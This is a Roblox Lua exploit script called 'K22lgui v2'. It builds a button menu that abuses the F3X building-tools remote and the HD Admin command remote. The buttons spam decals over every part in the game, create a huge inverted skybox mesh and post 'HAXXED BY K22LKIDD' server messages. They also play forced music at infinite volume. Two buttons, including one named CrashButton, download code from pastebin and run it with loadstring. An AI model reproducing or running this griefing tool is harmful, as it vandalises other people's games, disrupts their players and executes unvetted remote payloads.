local Players = game:GetService("Players") local LocalPlayer = Players.LocalPlayer local CoreGui = game:GetService("CoreGui") local ReplicatedStorage = game:GetService("ReplicatedStorage") local function getF3XRemote() local char = LocalPlayer.Character local bp = LocalPlayer:FindFirstChild("Backpack") if char and char:FindFirstChildOfClass("Tool") and char:FindFirstChildOfClass("Tool"):FindFirstChild("SyncAPI") then return char:FindFirstChildOfClass("Tool").SyncAPI:FindFirstChild("ServerEndpoint") elseif bp then for _, t in ipairs(bp:GetChildren()) do if t:IsA("Tool") and t:FindFirstChild("SyncAPI") then return t.SyncAPI:FindFirstChild("ServerEndpoint") end end end return nil end local function runHD(cmd) local ok, folder = pcall(function() return ReplicatedStorage:WaitForChild("HDAdminHDClient", 2) end) if ok and folder then local req = folder:WaitForChild("Signals"):WaitForChild("RequestCommand") req:InvokeServer(cmd) else warn("HD Admin not found") end end if CoreGui:FindFirstChild("t00nyjavaGuiSystem") then CoreGui.t00nyjavaGuiSystem:Destroy() end local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "t00nyjavaGuiSystem" ScreenGui.ResetOnSpawn = false ScreenGui.Parent = CoreGui local MainFrame = Instance.new("Frame") MainFrame.Name = "MainFrame" MainFrame.Size = UDim2.new(0, 320, 0, 300) MainFrame.Position = UDim2.new(0.5, -160, 0.5, -150) MainFrame.BackgroundColor3 = Color3.fromRGB(20, 20, 20) MainFrame.BorderSizePixel = 2 MainFrame.BorderColor3 = Color3.fromRGB(0, 0, 0) MainFrame.Active = true MainFrame.Draggable = true MainFrame.Parent = ScreenGui local Title = Instance.new("TextLabel") Title.Name = "Title" Title.Size = UDim2.new(1, 0, 0, 30) Title.Position = UDim2.new(0, 0, 0, 5) Title.BackgroundTransparency = 1 Title.Text = "K22lgui v2" Title.TextColor3 = Color3.fromRGB(255, 255, 255) Title.TextSize = 16 Title.TextXAlignment = Enum.TextXAlignment.Center Title.Font = Enum.Font.SourceSansBold Title.Parent = MainFrame local function createTopBtn(name, text, xPos, sizeX, clickFunc) local btn = Instance.new("TextButton") btn.Name = name btn.Size = UDim2.new(0, sizeX, 0, 22) btn.Position = UDim2.new(0, xPos, 0, 38) btn.BackgroundColor3 = Color3.fromRGB(45, 45, 45) btn.BorderSizePixel = 1 btn.BorderColor3 = Color3.fromRGB(70, 70, 70) btn.Text = text btn.TextColor3 = Color3.fromRGB(255, 255, 255) btn.TextSize = 11 btn.Font = Enum.Font.SourceSansBold btn.Parent = MainFrame btn.MouseButton1Click:Connect(clickFunc) end createTopBtn("BtoolsButton", "btools", 10, 45, function() runHD(";buildingtools") end) createTopBtn("R6Button", "r6", 60, 30, function() runHD(";r6") end) createTopBtn("ThemeButton", "k22lkidd theme", 95, 110, function() runHD(";music 139581929665915") end) createTopBtn("AddictedBtn", "addicted", 210, 100, function() runHD(";music 80590095242532") runHD(";pitch 1") runHD(";volume inf") end) local ScrollFrame = Instance.new("ScrollingFrame") ScrollFrame.Name = "ScrollFrame" ScrollFrame.Size = UDim2.new(1, -10, 1, -75) ScrollFrame.Position = UDim2.new(0, 5, 0, 68) ScrollFrame.BackgroundTransparency = 1 ScrollFrame.CanvasSize = UDim2.new(0, 0, 0, 300) ScrollFrame.ScrollBarThickness = 6 ScrollFrame.ScrollBarImageColor3 = Color3.fromRGB(80, 80, 80) ScrollFrame.Parent = MainFrame local UIGridLayout = Instance.new("UIGridLayout") UIGridLayout.CellSize = UDim2.new(0, 88, 0, 35) UIGridLayout.CellPadding = UDim2.new(0, 10, 0, 8) UIGridLayout.HorizontalAlignment = Enum.HorizontalAlignment.Center UIGridLayout.Parent = ScrollFrame local function createGridBtn(name, text) local btn = Instance.new("TextButton") btn.Name = name btn.Text = text btn.Size = UDim2.new(0, 88, 0, 35) btn.BackgroundColor3 = Color3.fromRGB(35, 35, 35) btn.BorderSizePixel = 1 btn.BorderColor3 = Color3.fromRGB(50, 50, 50) btn.TextColor3 = Color3.fromRGB(255, 255, 255) btn.TextSize = 12 btn.Font = Enum.Font.SourceSans btn.TextWrapped = true btn.Parent = ScrollFrame return btn end for i = 1, 16 do if i == 1 then local skyboxButton = createGridBtn("SkyboxButton", "skybox") skyboxButton.MouseButton1Click:Connect(function() local remote = getF3XRemote() if not remote then warn("F3X not found") return end local pos = LocalPlayer.Character and LocalPlayer.Character:GetPivot() or CFrame.new(0, 15, 0) local part = remote:InvokeServer("CreatePart", "Normal", pos, workspace) if part then remote:InvokeServer("CreateMeshes", { { ["Part"] = part } }) task.wait(0.1) remote:InvokeServer("SyncMesh", { { ["Part"] = part, ["MeshType"] = Enum.MeshType.FileMesh, ["Scale"] = Vector3.new(-10000, -10000, -10000), ["TextureId"] = "rbxassetid://135242049742611" } }) end end) elseif i == 2 then createGridBtn("DiscoButton", "disco").MouseButton1Click:Connect(function() runHD(";disco") runHD(";fog") end) elseif i == 3 then createGridBtn("FireAllButton", "realm").MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/u4gWDCbQ"))() end) elseif i == 4 then createGridBtn("ServerHintButton", "server hint").MouseButton1Click:Connect(function() runHD(";serverhint get haxxed by k22lkidd") end) elseif i == 5 then createGridBtn("ServerMessageButton", "server message").MouseButton1Click:Connect(function() runHD(";servermessage THIS GAME HAS BEEN HAXXED BY K22LKIDD LOLLL") end) elseif i == 6 then createGridBtn("ComboButton", "decal spam").MouseButton1Click:Connect(function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local player = game.Players.LocalPlayer local char = player.Character local tool for i,v in player:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end for i,v in game.ReplicatedStorage:GetDescendants() do if v.Name == "SyncAPI" then tool = v.Parent end end --craaa remote = tool.SyncAPI.ServerEndpoint function _(args) remote:InvokeServer(unpack(args)) end function SetCollision(part,boolean) local args = { [1] = "SyncCollision", [2] = { [1] = { ["Part"] = part, ["CanCollide"] = boolean } } } _(args) end function SetAnchor(boolean,part) local args = { [1] = "SyncAnchor", [2] = { [1] = { ["Part"] = part, ["Anchored"] = boolean } } } _(args) end function CreatePart(cf,parent) local args = { [1] = "CreatePart", [2] = "Normal", [3] = cf, [4] = parent } _(args) end function DestroyPart(part) local args = { [1] = "Remove", [2] = { [1] = part } } _(args) end function MovePart(part,cf) local args = { [1] = "SyncMove", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf } } } _(args) end function Resize(part,size,cf) local args = { [1] = "SyncResize", [2] = { [1] = { ["Part"] = part, ["CFrame"] = cf, ["Size"] = size } } } _(args) end function AddMesh(part) local args = { [1] = "CreateMeshes", [2] = { [1] = { ["Part"] = part } } } _(args) end function SetMesh(part,meshid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["MeshId"] = "rbxassetid://"..meshid } } } _(args) end function SetTexture(part, texid) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["TextureId"] = "rbxassetid://"..texid } } } _(args) end function SetName(part, stringg) local args = { [1] = "SetName", [2] = { [1] = part }, [3] = stringg } _(args) end function MeshResize(part,size) local args = { [1] = "SyncMesh", [2] = { [1] = { ["Part"] = part, ["Scale"] = size } } } _(args) end function Weld(part1, part2,lead) local args = { [1] = "CreateWelds", [2] = { [1] = part1, [2] = part2 }, [3] = lead } _(args) end function SetLocked(part,boolean) local args = { [1] = "SetLocked", [2] = { [1] = part }, [3] = boolean } _(args) end function SetTrans(part,int) local args = { [1] = "SyncMaterial", [2] = { [1] = { ["Part"] = part, ["Transparency"] = int } } } _(args) end function CreateSpotlight(part) local args = { [1] = "CreateLights", [2] = { [1] = { ["Part"] = part, ["LightType"] = "SpotLight" } } } _(args) end function SyncLighting(part,brightness) local args = { [1] = "SyncLighting", [2] = { [1] = { ["Part"] = part, ["LightType"] = "SpotLight", ["Brightness"] = brightness } } } _(args) end function Color(part,color) local args = { [1] = "SyncColor", [2] = { [1] = { ["Part"] = part, ["Color"] = color --[[Color3]], ["UnionColoring"] = false } } } _(args) end function SpawnDecal(part,side) local args = { [1] = "CreateTextures", [2] = { [1] = { ["Part"] = part, ["Face"] = side, ["TextureType"] = "Decal" } } } _(args) end function AddDecal(part,asset,side) local args = { [1] = "SyncTexture", [2] = { [1] = { ["Part"] = part, ["Face"] = side, ["TextureType"] = "Decal", ["Texture"] = "rbxassetid://".. asset } } } _(args) end function spam(id) for i,v in game.workspace:GetDescendants() do if v:IsA("BasePart") then spawn(function() SetLocked(v,false) SpawnDecal(v,Enum.NormalId.Front) AddDecal(v,id,Enum.NormalId.Front) SpawnDecal(v,Enum.NormalId.Back) AddDecal(v,id,Enum.NormalId.Back) SpawnDecal(v,Enum.NormalId.Right) AddDecal(v,id,Enum.NormalId.Right) SpawnDecal(v,Enum.NormalId.Left) AddDecal(v,id,Enum.NormalId.Left) SpawnDecal(v,Enum.NormalId.Bottom) AddDecal(v,id,Enum.NormalId.Bottom) SpawnDecal(v,Enum.NormalId.Top) AddDecal(v,id,Enum.NormalId.Top) end) end end end spam("135242049742611") end) elseif i == 7 then createGridBtn("BillboardButton", "billboard").MouseButton1Click:Connect(function() runHD(";titledg me k22lkidd") end) elseif i == 8 then createGridBtn("btoolsbutton", "spooky").MouseButton1Click:Connect(function() runHD(";music 71208882022079 ;pitch 0.1 ;volume inf") end) elseif i == 9 then createGridBtn("WontStopUsButton", "won't stop us").MouseButton1Click:Connect(function() runHD(";music 1847661783") end) elseif i == 10 then createGridBtn("SpartaRemixBtn", "this is sparta").MouseButton1Click:Connect(function() runHD(";music 140240856766854") runHD(";pitch 0.2") end) elseif i == 11 then createGridBtn("SpaghettiBtn", "spaghetti sparta").MouseButton1Click:Connect(function() runHD(";music 99907604701668") runHD(";pitch 0.13") end) elseif i == 12 then createGridBtn("JumpstyleDistroBtn", "jumpstyle distro").MouseButton1Click:Connect(function() runHD(";music 76578817848504") runHD(";pitch 1") runHD(";volume inf") end) elseif i == 13 then createGridBtn("JumpstyleLoopBtn", "jumpstyle loop").MouseButton1Click:Connect(function() runHD(";music 76578817848504") runHD(";pitch 0.28") runHD(";volume inf") end) elseif i == 14 then createGridBtn("JumpstylePix3lBtn", "zxyz jumpstyle").MouseButton1Click:Connect(function() runHD(";music 82179453487878") runHD(";pitch 0.14") runHD(";volume inf") end) elseif i == 15 then createGridBtn("LoveYouBtn", "i love you so").MouseButton1Click:Connect(function() runHD(";music 100048144167699") runHD(";pitch 1") runHD(";volume inf") end) elseif i == 16 then createGridBtn("CrashButton", "train").MouseButton1Click:Connect(function() loadstring(game:HttpGet("https://pastebin.com/raw/PUmPdJEX"))() end) end end